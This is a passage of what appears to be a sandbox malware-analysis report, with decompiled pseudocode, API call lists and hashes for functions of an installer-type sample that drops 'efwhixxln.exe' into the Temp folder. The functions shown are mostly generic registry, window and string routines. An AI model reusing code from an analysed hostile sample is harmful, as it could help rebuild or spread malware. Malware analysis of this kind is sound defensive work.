                                      						RegCloseKey(_v8);
                                      						_t35 = E00406A35(3);
                                      						if(_t35 != 0) {
                                      							return  *_t35(_a4, _a8, _t47, 0);
                                      						}
                                      						return RegDeleteKeyW(_a4, _a8);
                                      					}
                                      					_v12 = 0;
                                      					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                      						goto L10;
                                      					}
                                      					goto L3;
                                      				}
                                      				return _t27;
                                      			}












                                      0x00402eb4
                                      0x00402ebd
                                      0x00402ec6
                                      0x00402ed2
                                      0x00402edb
                                      0x00402ee5
                                      0x00402f0a
                                      0x00402f10
                                      0x00402f15
                                      0x00402f16
                                      0x00402f46
                                      0x00402f1f
                                      0x00402f21
                                      0x00402f71
                                      0x00402f74
                                      0x00000000
                                      0x00402f7a
                                      0x00402f30
                                      0x00402f35
                                      0x00402f37
                                      0x00000000
                                      0x00000000
                                      0x00402f3f
                                      0x00402f44
                                      0x00402f45
                                      0x00402f45
                                      0x00402f52
                                      0x00402f5a
                                      0x00402f61
                                      0x00000000
                                      0x00402f8a
                                      0x00000000
                                      0x00402f69
                                      0x00402ef5
                                      0x00402f08
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402f08
                                      0x00402f90

                                      APIs
                                      • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                      • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                      • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CloseEnum$DeleteValue
                                      • String ID:
                                      • API String ID: 1354259210-0
                                      • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                      • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                      • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                      • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E00401D81(void* __ebx, void* __edx) {
                                      				struct HWND__* _t30;
                                      				WCHAR* _t38;
                                      				void* _t48;
                                      				void* _t53;
                                      				signed int _t55;
                                      				signed int _t60;
                                      				long _t63;
                                      				void* _t65;
                                      
                                      				_t53 = __ebx;
                                      				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                      					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                      				} else {
                                      					E00402D84(2);
                                      					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                      				}
                                      				_t55 =  *(_t65 - 0x24);
                                      				 *(_t65 + 8) = _t30;
                                      				_t60 = _t55 & 0x00000004;
                                      				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                      				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                      				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                      				if((_t55 & 0x00010000) == 0) {
                                      					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                      				} else {
                                      					_t38 = E00402DA6(0x11);
                                      				}
                                      				 *(_t65 - 0x44) = _t38;
                                      				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                      				asm("sbb esi, esi");
                                      				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                      				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                      				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                      					DeleteObject(_t48);
                                      				}
                                      				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                      					_push(_t63);
                                      					E004065AF();
                                      				}
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
                                      				return 0;
                                      			}











                                      0x00401d81
                                      0x00401d85
                                      0x00401d9a
                                      0x00401d87
                                      0x00401d89
                                      0x00401d8f
                                      0x00401d8f
                                      0x00401da0
                                      0x00401da3
                                      0x00401dad
                                      0x00401db0
                                      0x00401db8
                                      0x00401dc9
                                      0x00401dcc
                                      0x00401dd7
                                      0x00401dce
                                      0x00401dd0
                                      0x00401dd0
                                      0x00401ddb
                                      0x00401de5
                                      0x00401e0c
                                      0x00401e1b
                                      0x00401e29
                                      0x00401e31
                                      0x00401e39
                                      0x00401e39
                                      0x00401e42
                                      0x00401e48
                                      0x00402ba4
                                      0x00402ba4
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00401D9A
                                      • GetClientRect.USER32 ref: 00401DE5
                                      • LoadImageW.USER32 ref: 00401E15
                                      • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                      • DeleteObject.GDI32(00000000), ref: 00401E39
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                      • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                      • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                      • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 73%
                                      			E00401E4E(intOrPtr __edx) {
                                      				void* __edi;
                                      				int _t9;
                                      				signed char _t15;
                                      				struct HFONT__* _t18;
                                      				intOrPtr _t30;
                                      				void* _t31;
                                      				struct HDC__* _t33;
                                      				void* _t35;
                                      
                                      				_t30 = __edx;
                                      				_t33 = GetDC( *(_t35 - 8));
                                      				_t9 = E00402D84(2);
                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                      				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                      				ReleaseDC( *(_t35 - 8), _t33);
                                      				 *0x40ce08 = E00402D84(3);
                                      				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                      				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                      				 *0x40ce0f = 1;
                                      				 *0x40ce0c = _t15 & 0x00000001;
                                      				 *0x40ce0d = _t15 & 0x00000002;
                                      				 *0x40ce0e = _t15 & 0x00000004;
                                      				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
                                      				_t18 = CreateFontIndirectW(0x40cdf8);
                                      				_push(_t18);
                                      				_push(_t31);
                                      				E004065AF();
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                      				return 0;
                                      			}











                                      0x00401e4e
                                      0x00401e59
                                      0x00401e5b
                                      0x00401e68
                                      0x00401e7f
                                      0x00401e84
                                      0x00401e91
                                      0x00401e96
                                      0x00401e9a
                                      0x00401ea5
                                      0x00401eac
                                      0x00401ebe
                                      0x00401ec4
                                      0x00401ec9
                                      0x00401ed3
                                      0x00402638
                                      0x0040156d
                                      0x00402ba4
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • GetDC.USER32(?), ref: 00401E51
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                      • MulDiv.KERNEL32 ref: 00401E73
                                      • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                      • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2584051700-0
                                      • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                      • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                      • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                      • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 59%
                                      			E00401C43(intOrPtr __edx) {
                                      				int _t29;
                                      				long _t30;
                                      				signed int _t32;
                                      				WCHAR* _t35;
                                      				long _t36;
                                      				int _t41;
                                      				signed int _t42;
                                      				int _t46;
                                      				int _t56;
                                      				intOrPtr _t57;
                                      				struct HWND__* _t63;
                                      				void* _t64;
                                      
                                      				_t57 = __edx;
                                      				_t29 = E00402D84(3);
                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                      				 *(_t64 - 0x18) = _t29;
                                      				_t30 = E00402D84(4);
                                      				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                      				 *(_t64 + 8) = _t30;
                                      				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                      					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                      				}
                                      				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                      				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                      					 *(_t64 + 8) = E00402DA6(0x44);
                                      				}
                                      				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                      				_push(1);
                                      				if(__eflags != 0) {
                                      					_t61 = E00402DA6();
                                      					_t32 = E00402DA6();
                                      					asm("sbb ecx, ecx");
                                      					asm("sbb eax, eax");
                                      					_t35 =  ~( *_t31) & _t61;
                                      					__eflags = _t35;
                                      					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                      					goto L10;
                                      				} else {
                                      					_t63 = E00402D84();
                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                      					_t41 = E00402D84(2);
                                      					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                      					_t56 =  *(_t64 - 0x1c) >> 2;
                                      					if(__eflags == 0) {
                                      						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                      						L10:
                                      						 *(_t64 - 0x38) = _t36;
                                      					} else {
                                      						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                      						asm("sbb eax, eax");
                                      						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                      					}
                                      				}
                                      				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                      				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                      					_push( *(_t64 - 0x38));
                                      					E004065AF();
                                      				}
                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                      				return 0;
                                      			}















                                      0x00401c43
                                      0x00401c45
                                      0x00401c4c
                                      0x00401c4f
                                      0x00401c52
                                      0x00401c5c
                                      0x00401c60
                                      0x00401c63
                                      0x00401c6c
                                      0x00401c6c
                                      0x00401c6f
                                      0x00401c73
                                      0x00401c7c
                                      0x00401c7c
                                      0x00401c7f
                                      0x00401c83
                                      0x00401c85
                                      0x00401cda
                                      0x00401cdc
                                      0x00401ce7
                                      0x00401cf1
                                      0x00401cf4
                                      0x00401cf4
                                      0x00401cfd
                                      0x00000000
                                      0x00401c87
                                      0x00401c8e
                                      0x00401c90
                                      0x00401c93
                                      0x00401c99
                                      0x00401ca0
                                      0x00401ca3
                                      0x00401ccb
                                      0x00401d03
                                      0x00401d03
                                      0x00401ca5
                                      0x00401cb3
                                      0x00401cbb
                                      0x00401cbe
                                      0x00401cbe
                                      0x00401ca3
                                      0x00401d06
                                      0x00401d09
                                      0x00401d0f
                                      0x00402ba4
                                      0x00402ba4
                                      0x00402c2d
                                      0x00402c39

                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                      • Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
                                      • Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
                                      • Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00406536(void* __ecx, void* __eflags, char _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                      				int _v8;
                                      				long _t21;
                                      				long _t24;
                                      				char* _t30;
                                      
                                      				asm("sbb eax, eax");
                                      				_v8 = 0x800;
                                      				_t5 =  &_a4; // 0x422728
                                      				_t21 = E004064D5(__eflags,  *_t5, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                      				_t30 = _a16;
                                      				if(_t21 != 0) {
                                      					L4:
                                      					 *_t30 =  *_t30 & 0x00000000;
                                      				} else {
                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                      					_t21 = RegCloseKey(_a20);
                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                      						goto L4;
                                      					}
                                      				}
                                      				return _t21;
                                      			}







                                      0x00406544
                                      0x00406546
                                      0x0040655b
                                      0x0040655e
                                      0x00406563
                                      0x00406568
                                      0x004065a6
                                      0x004065a6
                                      0x0040656a
                                      0x0040657c
                                      0x00406587
                                      0x0040658d
                                      0x00406598
                                      0x00000000
                                      0x00000000
                                      0x00406598
                                      0x004065ac

                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230), ref: 0040657C
                                      • RegCloseKey.ADVAPI32(?), ref: 00406587
                                      Strings
                                      • "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl, xrefs: 0040653D
                                      • ('B, xrefs: 0040655B
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$('B
                                      • API String ID: 3356406503-803478358
                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                      • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E00405F37(WCHAR* _a4) {
                                      				WCHAR* _t9;
                                      
                                      				_t9 = _a4;
                                      				_push( &(_t9[lstrlenW(_t9)]));
                                      				_push(_t9);
                                      				if( *(CharPrevW()) != 0x5c) {
                                      					lstrcatW(_t9, 0x40a014);
                                      				}
                                      				return _t9;
                                      			}




                                      0x00405f38
                                      0x00405f45
                                      0x00405f46
                                      0x00405f51
                                      0x00405f59
                                      0x00405f59
                                      0x00405f61

                                      APIs
                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                      • CharPrevW.USER32(?,00000000), ref: 00405F47
                                      • lstrcatW.KERNEL32 ref: 00405F59
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-4017390910
                                      • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                      • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                      • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                      • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                      				int _t15;
                                      				long _t16;
                                      
                                      				_t15 = _a8;
                                      				if(_t15 != 0x102) {
                                      					if(_t15 != 0x200) {
                                      						_t16 = _a16;
                                      						L7:
                                      						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                      							_push(_t16);
                                      							_push(6);
                                      							 *0x423734 = _t16;
                                      							E00404FFF();
                                      						}
                                      						L11:
                                      						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                      					}
                                      					if(IsWindowVisible(_a4) == 0) {
                                      						L10:
                                      						_t16 = _a16;
                                      						goto L11;
                                      					}
                                      					_t16 = E00404F7F(_a4, 1);
                                      					_t15 = 0x419;
                                      					goto L7;
                                      				}
                                      				if(_a12 != 0x20) {
                                      					goto L10;
                                      				}
                                      				E00404610(0x413);
                                      				return 0;
                                      			}





                                      0x00405642
                                      0x0040564c
                                      0x00405668
                                      0x0040568a
                                      0x0040568d
                                      0x00405693
                                      0x0040569d
                                      0x0040569e
                                      0x004056a0
                                      0x004056a6
                                      0x004056a6
                                      0x004056b0
                                      0x00000000
                                      0x004056be
                                      0x00405675
                                      0x004056ad
                                      0x004056ad
                                      0x00000000
                                      0x004056ad
                                      0x00405681
                                      0x00405683
                                      0x00000000
                                      0x00405683
                                      0x00405652
                                      0x00000000
                                      0x00000000
                                      0x00405659
                                      0x00000000

                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 0040566D
                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                        • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                      • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                      • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                      • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                      				int _v8;
                                      				int _t12;
                                      				int _t14;
                                      				int _t15;
                                      				CHAR* _t17;
                                      				CHAR* _t27;
                                      
                                      				_t12 = lstrlenA(_a8);
                                      				_t27 = _a4;
                                      				_v8 = _t12;
                                      				while(lstrlenA(_t27) >= _v8) {
                                      					_t14 = _v8;
                                      					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                      					_t15 = lstrcmpiA(_t27, _a8);
                                      					_t27[_v8] =  *(_t14 + _t27);
                                      					if(_t15 == 0) {
                                      						_t17 = _t27;
                                      					} else {
                                      						_t27 = CharNextA(_t27);
                                      						continue;
                                      					}
                                      					L5:
                                      					return _t17;
                                      				}
                                      				_t17 = 0;
                                      				goto L5;
                                      			}









                                      0x004060cd
                                      0x004060cf
                                      0x004060d2
                                      0x004060fe
                                      0x004060d7
                                      0x004060e0
                                      0x004060e5
                                      0x004060f0
                                      0x004060f3
                                      0x0040610f
                                      0x004060f5
                                      0x004060fc
                                      0x00000000
                                      0x004060fc
                                      0x00406108
                                      0x0040610c
                                      0x0040610c
                                      0x00406106
                                      0x00000000

                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                      • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                      • CharNextA.USER32(00000000), ref: 004060F6
                                      • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
